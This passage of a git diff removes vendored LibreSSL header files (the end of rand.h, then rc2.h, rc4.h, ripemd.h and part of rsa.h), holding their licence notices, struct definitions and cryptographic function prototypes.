- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stdlib.h>
-
-#ifndef HEADER_RAND_H
-#define HEADER_RAND_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Already defined in ossl_typ.h */
-/* typedef struct rand_meth_st RAND_METHOD; */
-
-struct rand_meth_st {
-	void (*seed)(const void *buf, int num);
-	int (*bytes)(unsigned char *buf, int num);
-	void (*cleanup)(void);
-	void (*add)(const void *buf, int num, double entropy);
-	int (*pseudorand)(unsigned char *buf, int num);
-	int (*status)(void);
-};
-
-int RAND_set_rand_method(const RAND_METHOD *meth);
-const RAND_METHOD *RAND_get_rand_method(void);
-#ifndef OPENSSL_NO_ENGINE
-int RAND_set_rand_engine(ENGINE *engine);
-#endif
-RAND_METHOD *RAND_SSLeay(void);
-
-#ifndef LIBRESSL_INTERNAL
-void RAND_cleanup(void );
-int  RAND_bytes(unsigned char *buf, int num);
-int  RAND_pseudo_bytes(unsigned char *buf, int num);
-void RAND_seed(const void *buf, int num);
-void RAND_add(const void *buf, int num, double entropy);
-int  RAND_load_file(const char *file, long max_bytes);
-int  RAND_write_file(const char *file);
-const char *RAND_file_name(char *file, size_t num);
-int RAND_status(void);
-int RAND_poll(void);
-#endif
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_RAND_strings(void);
-
-/* Error codes for the RAND functions. (no longer used) */
-
-/* Function codes. */
-#define RAND_F_RAND_GET_RAND_METHOD			 101
-#define RAND_F_RAND_INIT_FIPS				 102
-#define RAND_F_SSLEAY_RAND_BYTES			 100
-
-/* Reason codes. */
-#define RAND_R_DUAL_EC_DRBG_DISABLED			 104
-#define RAND_R_ERROR_INITIALISING_DRBG			 102
-#define RAND_R_ERROR_INSTANTIATING_DRBG			 103
-#define RAND_R_NO_FIPS_RANDOM_METHOD_SET		 101
-#define RAND_R_PRNG_NOT_SEEDED				 100
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/rc2.h b/thirdparty/libressl/include/openssl/rc2.h
deleted file mode 100644
index 21511ff..0000000
--- a/thirdparty/libressl/include/openssl/rc2.h
+++ /dev/null
@@ -1,101 +0,0 @@
-/* $OpenBSD: rc2.h,v 1.11 2014/07/10 22:45:57 jsing Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_RC2_H
-#define HEADER_RC2_H
-
-#include <openssl/opensslconf.h> /* OPENSSL_NO_RC2, RC2_INT */
-
-#ifdef OPENSSL_NO_RC2
-#error RC2 is disabled.
-#endif
-
-#define RC2_ENCRYPT	1
-#define RC2_DECRYPT	0
-
-#define RC2_BLOCK	8
-#define RC2_KEY_LENGTH	16
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct rc2_key_st
-	{
-	RC2_INT data[64];
-	} RC2_KEY;
-
-void RC2_set_key(RC2_KEY *key, int len, const unsigned char *data,int bits);
-void RC2_ecb_encrypt(const unsigned char *in,unsigned char *out,RC2_KEY *key,
-		     int enc);
-void RC2_encrypt(unsigned long *data,RC2_KEY *key);
-void RC2_decrypt(unsigned long *data,RC2_KEY *key);
-void RC2_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
-	RC2_KEY *ks, unsigned char *iv, int enc);
-void RC2_cfb64_encrypt(const unsigned char *in, unsigned char *out,
-		       long length, RC2_KEY *schedule, unsigned char *ivec,
-		       int *num, int enc);
-void RC2_ofb64_encrypt(const unsigned char *in, unsigned char *out,
-		       long length, RC2_KEY *schedule, unsigned char *ivec,
-		       int *num);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/rc4.h b/thirdparty/libressl/include/openssl/rc4.h
deleted file mode 100644
index f59185e..0000000
--- a/thirdparty/libressl/include/openssl/rc4.h
+++ /dev/null
@@ -1,89 +0,0 @@
-/* $OpenBSD: rc4.h,v 1.13 2015/10/20 15:50:13 jsing Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_RC4_H
-#define HEADER_RC4_H
-
-#include <openssl/opensslconf.h> /* OPENSSL_NO_RC4, RC4_INT */
-
-#ifdef OPENSSL_NO_RC4
-#error RC4 is disabled.
-#endif
-
-#include <stddef.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct rc4_key_st {
-	RC4_INT x, y;
-	RC4_INT data[256];
-} RC4_KEY;
-
-const char *RC4_options(void);
-void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
-void private_RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
-void RC4(RC4_KEY *key, size_t len, const unsigned char *indata,
-    unsigned char *outdata);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/ripemd.h b/thirdparty/libressl/include/openssl/ripemd.h
deleted file mode 100644
index a5f3a12..0000000
--- a/thirdparty/libressl/include/openssl/ripemd.h
+++ /dev/null
@@ -1,105 +0,0 @@
-/* $OpenBSD: ripemd.h,v 1.14 2014/07/10 22:45:57 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_RIPEMD_H
-#define HEADER_RIPEMD_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_RIPEMD
-#error RIPEMD is disabled.
-#endif
-
-#if defined(__LP32__)
-#define RIPEMD160_LONG unsigned long
-#elif defined(__ILP64__)
-#define RIPEMD160_LONG unsigned long
-#define RIPEMD160_LONG_LOG2 3
-#else
-#define RIPEMD160_LONG unsigned int
-#endif
-
-#define RIPEMD160_CBLOCK	64
-#define RIPEMD160_LBLOCK	(RIPEMD160_CBLOCK/4)
-#define RIPEMD160_DIGEST_LENGTH	20
-
-typedef struct RIPEMD160state_st
-	{
-	RIPEMD160_LONG A,B,C,D,E;
-	RIPEMD160_LONG Nl,Nh;
-	RIPEMD160_LONG data[RIPEMD160_LBLOCK];
-	unsigned int   num;
-	} RIPEMD160_CTX;
-
-int RIPEMD160_Init(RIPEMD160_CTX *c);
-int RIPEMD160_Update(RIPEMD160_CTX *c, const void *data, size_t len);
-int RIPEMD160_Final(unsigned char *md, RIPEMD160_CTX *c);
-unsigned char *RIPEMD160(const unsigned char *d, size_t n,
-	unsigned char *md);
-void RIPEMD160_Transform(RIPEMD160_CTX *c, const unsigned char *b);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/rsa.h b/thirdparty/libressl/include/openssl/rsa.h
deleted file mode 100644
index 7476a11..0000000
--- a/thirdparty/libressl/include/openssl/rsa.h
+++ /dev/null
@@ -1,550 +0,0 @@
-/* $OpenBSD: rsa.h,v 1.31 2017/08/30 16:07:35 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_RSA_H
-#define HEADER_RSA_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/asn1.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/crypto.h>
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef OPENSSL_NO_RSA
-#error RSA is disabled.
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Declared already in ossl_typ.h */
-/* typedef struct rsa_st RSA; */
-/* typedef struct rsa_meth_st RSA_METHOD; */
-
-struct rsa_meth_st {
-	const char *name;
-	int (*rsa_pub_enc)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_pub_dec)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_priv_enc)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_priv_dec)(int flen, const unsigned char *from,
-	    unsigned char *to, RSA *rsa, int padding);
-	int (*rsa_mod_exp)(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
-	    BN_CTX *ctx); /* Can be null */
-	int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx); /* Can be null */
-	int (*init)(RSA *rsa);		/* called at new */
-	int (*finish)(RSA *rsa);	/* called at free */
-	int flags;			/* RSA_METHOD_FLAG_* things */
-	char *app_data;			/* may be needed! */
-/* New sign and verify functions: some libraries don't allow arbitrary data
- * to be signed/verified: this allows them to be used. Note: for this to work
- * the RSA_public_decrypt() and RSA_private_encrypt() should *NOT* be used
- * RSA_sign(), RSA_verify() should be used instead. Note: for backwards
- * compatibility this functionality is only enabled if the RSA_FLAG_SIGN_VER
- * option is set in 'flags'.
- */
-	int (*rsa_sign)(int type, const unsigned char *m, unsigned int m_length,
-	    unsigned char *sigret, unsigned int *siglen, const RSA *rsa);
-	int (*rsa_verify)(int dtype, const unsigned char *m,
-	    unsigned int m_length, const unsigned char *sigbuf,
-	    unsigned int siglen, const RSA *rsa);
-/* If this callback is NULL, the builtin software RSA key-gen will be used. This
- * is for behavioural compatibility whilst the code gets rewired, but one day
- * it would be nice to assume there are no such things as "builtin software"
- * implementations. */
-	int (*rsa_keygen)(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
-};
-
-struct rsa_st {
-	/* The first parameter is used to pickup errors where
-	 * this is passed instead of aEVP_PKEY, it is set to 0 */
-	int pad;
-	long version;
-	const RSA_METHOD *meth;
-	/* functional reference if 'meth' is ENGINE-provided */
-	ENGINE *engine;
-	BIGNUM *n;
-	BIGNUM *e;
-	BIGNUM *d;
-	BIGNUM *p;
-	BIGNUM *q;
-	BIGNUM *dmp1;
-	BIGNUM *dmq1;
-	BIGNUM *iqmp;
-	/* be careful using this if the RSA structure is shared */
-	CRYPTO_EX_DATA ex_data;
-	int references;
-	int flags;
-
-	/* Used to cache montgomery values */
-	BN_MONT_CTX *_method_mod_n;
-	BN_MONT_CTX *_method_mod_p;
-	BN_MONT_CTX *_method_mod_q;
-
-	/* all BIGNUM values are actually in the following data, if it is not
-	 * NULL */
-	BN_BLINDING *blinding;
-	BN_BLINDING *mt_blinding;
-};
-
-#ifndef OPENSSL_RSA_MAX_MODULUS_BITS
-# define OPENSSL_RSA_MAX_MODULUS_BITS	16384
-#endif
-
-#ifndef OPENSSL_RSA_SMALL_MODULUS_BITS
-# define OPENSSL_RSA_SMALL_MODULUS_BITS	3072
-#endif
-#ifndef OPENSSL_RSA_MAX_PUBEXP_BITS
-# define OPENSSL_RSA_MAX_PUBEXP_BITS	64 /* exponent limit enforced for "large" modulus only */
-#endif
-
-#define RSA_3	0x3L
-#define RSA_F4	0x10001L
-
-/* Don't check pub/private match. */
-#define RSA_METHOD_FLAG_NO_CHECK	0x0001
-
-#define RSA_FLAG_CACHE_PUBLIC		0x0002
-#define RSA_FLAG_CACHE_PRIVATE		0x0004
-#define RSA_FLAG_BLINDING		0x0008
-#define RSA_FLAG_THREAD_SAFE		0x0010
-
-/*
- * This flag means the private key operations will be handled by rsa_mod_exp
- * and that they do not depend on the private key components being present:
- * for example a key stored in external hardware. Without this flag bn_mod_exp
- * gets called when private key components are absent.
- */
-#define RSA_FLAG_EXT_PKEY		0x0020
-
-/*
- * This flag in the RSA_METHOD enables the new rsa_sign, rsa_verify functions.
- */
-#define RSA_FLAG_SIGN_VER		0x0040
-
-/*
- * The built-in RSA implementation uses blinding by default, but other engines
- * might not need it.
- */
-#define RSA_FLAG_NO_BLINDING		0x0080
-
-#define EVP_PKEY_CTX_set_rsa_padding(ctx, pad) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, -1, EVP_PKEY_CTRL_RSA_PADDING, \
-				pad, NULL)
-
-#define EVP_PKEY_CTX_get_rsa_padding(ctx, ppad) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, -1, \
-				EVP_PKEY_CTRL_GET_RSA_PADDING, 0, ppad)
-
-#define EVP_PKEY_CTX_set_rsa_pss_saltlen(ctx, len) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
-				(EVP_PKEY_OP_SIGN|EVP_PKEY_OP_VERIFY), \
-				EVP_PKEY_CTRL_RSA_PSS_SALTLEN, \
-				len, NULL)
-
-#define EVP_PKEY_CTX_get_rsa_pss_saltlen(ctx, plen) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, \
-				(EVP_PKEY_OP_SIGN|EVP_PKEY_OP_VERIFY), \
-				EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN, \
-				0, plen)
-
-#define EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, bits) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_KEYGEN, \
-				EVP_PKEY_CTRL_RSA_KEYGEN_BITS, bits, NULL)
-
-#define EVP_PKEY_CTX_set_rsa_keygen_pubexp(ctx, pubexp) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_KEYGEN, \
-				EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP, 0, pubexp)
-
-#define	 EVP_PKEY_CTX_set_rsa_mgf1_md(ctx, md)	\
-		EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_SIG,  \
-				EVP_PKEY_CTRL_RSA_MGF1_MD, 0, (void *)md)
-
-#define	 EVP_PKEY_CTX_get_rsa_mgf1_md(ctx, pmd)	\
-		EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_RSA, EVP_PKEY_OP_TYPE_SIG,  \
-				EVP_PKEY_CTRL_GET_RSA_MGF1_MD, 0, (void *)pmd)
-
-#define EVP_PKEY_CTRL_RSA_PADDING	(EVP_PKEY_ALG_CTRL + 1)
-#define EVP_PKEY_CTRL_RSA_PSS_SALTLEN	(EVP_PKEY_ALG_CTRL + 2)
-
-#define EVP_PKEY_CTRL_RSA_KEYGEN_BITS	(EVP_PKEY_ALG_CTRL + 3)
-#define EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP	(EVP_PKEY_ALG_CTRL + 4)
-#define EVP_PKEY_CTRL_RSA_MGF1_MD	(EVP_PKEY_ALG_CTRL + 5)
-
-#define EVP_PKEY_CTRL_GET_RSA_PADDING		(EVP_PKEY_ALG_CTRL + 6)
-#define EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN	(EVP_PKEY_ALG_CTRL + 7)
-#define EVP_PKEY_CTRL_GET_RSA_MGF1_MD		(EVP_PKEY_ALG_CTRL + 8)
-
-#define RSA_PKCS1_PADDING	1
-#define RSA_SSLV23_PADDING	2
-#define RSA_NO_PADDING		3
-#define RSA_PKCS1_OAEP_PADDING	4
-#define RSA_X931_PADDING	5
-/* EVP_PKEY_ only */
-#define RSA_PKCS1_PSS_PADDING	6
-
-#define RSA_PKCS1_PADDING_SIZE	11
-
-#define RSA_set_app_data(s,arg)         RSA_set_ex_data(s,0,arg)
-#define RSA_get_app_data(s)             RSA_get_ex_data(s,0)
-
-RSA *RSA_new(void);
-RSA *RSA_new_method(ENGINE *engine);
-int RSA_size(const RSA *rsa);
-
-/* Deprecated version */
-#ifndef OPENSSL_NO_DEPRECATED
-RSA *RSA_generate_key(int bits, unsigned long e,
-    void (*callback)(int, int, void *), void *cb_arg);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* New version */
-int RSA_generate_key_ex(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
-
-int RSA_check_key(const RSA *);
-/* next 4 return -1 on error */
-int RSA_public_encrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-int RSA_private_encrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-int RSA_public_decrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-int RSA_private_decrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-void RSA_free(RSA *r);
-/* "up" the RSA object's reference count */
-int RSA_up_ref(RSA *r);
-
-int RSA_flags(const RSA *r);
-
-void RSA_set_default_method(const RSA_METHOD *meth);
-const RSA_METHOD *RSA_get_default_method(void);
-const RSA_METHOD *RSA_get_method(const RSA *rsa);
-int RSA_set_method(RSA *rsa, const RSA_METHOD *meth);
-
-/* these are the actual SSLeay RSA functions */
-const RSA_METHOD *RSA_PKCS1_SSLeay(void);
-
-const RSA_METHOD *RSA_null_method(void);
-
-RSA *d2i_RSAPublicKey(RSA **a, const unsigned char **in, long len);
-int i2d_RSAPublicKey(const RSA *a, unsigned char **out);
-extern const ASN1_ITEM RSAPublicKey_it;
-RSA *d2i_RSAPrivateKey(RSA **a, const unsigned char **in, long len);
-int i2d_RSAPrivateKey(const RSA *a, unsigned char **out);
-extern const ASN1_ITEM RSAPrivateKey_it;
-
-typedef struct rsa_pss_params_st {
-	X509_ALGOR *hashAlgorithm;
-	X509_ALGOR *maskGenAlgorithm;
-	ASN1_INTEGER *saltLength;
-	ASN1_INTEGER *trailerField;
-} RSA_PSS_PARAMS;
-
-RSA_PSS_PARAMS *RSA_PSS_PARAMS_new(void);
-void RSA_PSS_PARAMS_free(RSA_PSS_PARAMS *a);
-RSA_PSS_PARAMS *d2i_RSA_PSS_PARAMS(RSA_PSS_PARAMS **a, const unsigned char **in, long len);
-int i2d_RSA_PSS_PARAMS(RSA_PSS_PARAMS *a, unsigned char **out);
-extern const ASN1_ITEM RSA_PSS_PARAMS_it;
-
-int RSA_print_fp(FILE *fp, const RSA *r, int offset);
-
-#ifndef OPENSSL_NO_BIO
-int RSA_print(BIO *bp, const RSA *r, int offset);
-#endif
-
-#ifndef OPENSSL_NO_RC4
-int i2d_RSA_NET(const RSA *a, unsigned char **pp,
-    int (*cb)(char *buf, int len, const char *prompt, int verify), int sgckey);
